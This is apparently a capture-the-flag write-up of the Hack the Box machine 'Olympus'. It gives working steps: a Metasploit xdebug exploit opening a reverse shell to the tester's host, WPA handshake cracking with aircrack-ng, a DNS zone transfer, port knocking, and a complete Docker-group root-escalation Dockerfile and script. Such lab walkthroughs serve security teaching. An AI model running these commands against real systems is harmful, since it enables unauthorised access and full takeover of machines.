This post details the epic journey undertaken to meet with the ancient greek gods, represented here by the retired Hack the Box machine, Olympus.

Enumeration

As pretty much always, we begin with our initial enumeration using nmap.

$ nmap -sC -sV -p- -oA nmap/scan 10.10.10.83

Some interesting results here; a filtered ssh port, DNS Bind running on tcp port 53, http running, and yet another ssh service running on 2222 with an interesting fingerprint string.

Let's start with the HTTP service. Browsing to the site presents us with an image of Zeus and not much else. So lets take a closer look at what is going on using Burp.

Exploit

Looking at the response in Burp we find an interesting and uncommon header, xdebug. A quick google shows that this is an extension for PHP to assist with debugging and development i.e. something which should never go into production, and that version 2.5.5 and below have a Remote Command Execution exploit available. If your metasploit is up to date then we even have the exploit ready to go.

> use exploit/unix/http/xdebug_unauth_exec
> set rhost 10.10.10.83
> set lhost 10.10.14.15
> set lport 4444
> exploit

More Enumeration

And that gives us a meterpreter session, however the shell is very basic and is lacking a lot of commands such as python, so we can't really improve it. Fortunately, something stands out fairly quickly in our enumeration. There is a tool called airgeddon sitting in the home folder, and there already seems to be a nice packet capture sat in the captured directory.

Along with the packet capture is a text file which states Captured while flying. I'll banish him to Olympia - Zeus. Referring back to our nmap scan, could this Olympia be referring to the second ssh service with the interesting fingerprint string?

Closing the shell and returning to the meterpreter session we can download the packet capture to our machine using the following command:

> download /home/zeus/airgeddon/captured/captured.cap

Cracking

Now we can open it in Wireshark, and looking at the packets it is fairly obvious that it is all Wireless 802.11 traffic. So lets see what we can see.

The first thing that we make note of is the SSID of the wireless network being broadcast, Too_cl0se_to_th3_Sun.

Next, setting the display filter to eapol and scrolling through the results show us that we have a full 4 way handshake towards the end of the file, meaning we can use aircrack-ng to attempt to brute-force the pre-shared key.

Make a note of the MAC address of the access point (the BSS ID), and then run the following:

$ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b f4:ec:38:ab:a8:a9 captured.cap

This may take some time, so go and make yourself some nectar of the gods, or whatever else you fancy drinking.

After a while we get a result. The pre-shared key passphrase is flightoficarus.

So let's make some educated guesses here, given the wireless passphrase of flightoficarus, could our ssh username be icarus, and could the SSID be the password?

It is! That took me an embarrassingly long time to link in my head.

Further Enumeration

In the home directory of this new user is a single text file, called help_of_the_gods.txt. It contains the message:

Athena goddess will guide you through the dark...

Way to Rhodes...
ctfolympus.htb

That last line looks suspiciously like a domain name. Maybe we can use that with the DNS service on TCP port 53. So bring up another terminal on your host machine and lets see if we can get a zone transfer.

$ dig axfr @10.10.10.83 ctfolympus.htb

; <<>> DiG 9.11.3-1-Debian <<>> axfr @10.10.10.83 ctfolympus.htb
; (1 server found)
;; global options: +cmd
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb.		86400	IN	TXT	"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb.		86400	IN	A	192.168.0.120
ctfolympus.htb.		86400	IN	NS	ns1.ctfolympus.htb.
ctfolympus.htb.		86400	IN	NS	ns2.ctfolympus.htb.
ctfolympus.htb.		86400	IN	MX	10 mail.ctfolympus.htb.
crete.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
hades.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
mail.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns1.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns2.ctfolympus.htb.	86400	IN	A	192.168.0.120
rhodes.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN	TXT	"Here lies the great Colossus of Rhodes"
www.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 24 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Thu May 10 10:39:36 EDT 2018
;; XFR size: 15 records (messages 1, bytes 475)

Take a close look at the TXT entry near the top of the results. That clue leads me to think that the currently filtered ssh service on port 22 could be opened temporarily, and those numbers given suggest to me that the way to open it is to use a technique called port knocking.

Knock, Knock

We can test our theory with a single line bash script.

$ for x in 3456 8234 62431; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.83; done
$ ssh [email protected]

Then using the username prometheus and the password of St34l_th3_F1re!, we are in. We have gained access to Hades, and access to the first flag! Our epic journey is almost at an end.

Yet More Enumeration

Enumerating this machine, we can see that our current user is a member of the Docker group (which explains all those other limited shells we were stuck in, they were all Docker containers), and checking on the running services we can see that Docker is installed and running. Some more googling of privilege escalation vectors soon leads me to the following article, privilege escalation via docker.

The page links through to a github repository so we can download and modify the Dockerfile and the script it uses - this is because this machine does not have access to the internet to be able to download the images directly.

Root Exploit

So we create a directory for our docker image, and then create a Dockerfile:

#
# Dockerfile
#

FROM ubuntu:14.04
COPY exploit.sh /exploit.sh
CMD ["/bin/bash", "exploit.sh"]

Note the FROM line in there. We need to change it as we are unable to download this image. A quick docker images command shows us what is installed, so we can modify the Dockerfile to the following:

#
# Dockerfile
#

FROM olympia
COPY exploit.sh /exploit.sh
CMD ["/bin/bash", "exploit.sh"]

Then we create the exploit.sh containing the following:

#
# 
#

if [ ! -d "/hostOS" ]; then
  echo
  echo ==== ERROR ====
  echo It looks like /hostOS does not exist
  echo Please run this docker image with a /hostOS volume mounted to /
  echo For example: docker run -v /:/hostOS -i -t exploitapp
  echo
  exit
fi

if [ ! -e "/hostOS/bin/sh" ]; then
  echo
  echo ==== ERROR ====
  echo It looks like /hostOS does not contain a root filesystem
  echo Please run this docker image with a /hostOS volume mounted to /
  echo For example: docker run -v /:/hostOS -i -t exploitapp
  echo
  exit
fi

echo
echo You should now have a root shell on the host OS
echo Press Ctrl-D to exit the docker instance / shell
chroot /hostOS /bin/sh

Now tie it all up in a bow:

$ docker build -t rootplease .
$ docker run -v /:/hostOS -i -t rootplease

And there we go, root and access to the final flag. Our epic journey to mount Olympus is complete.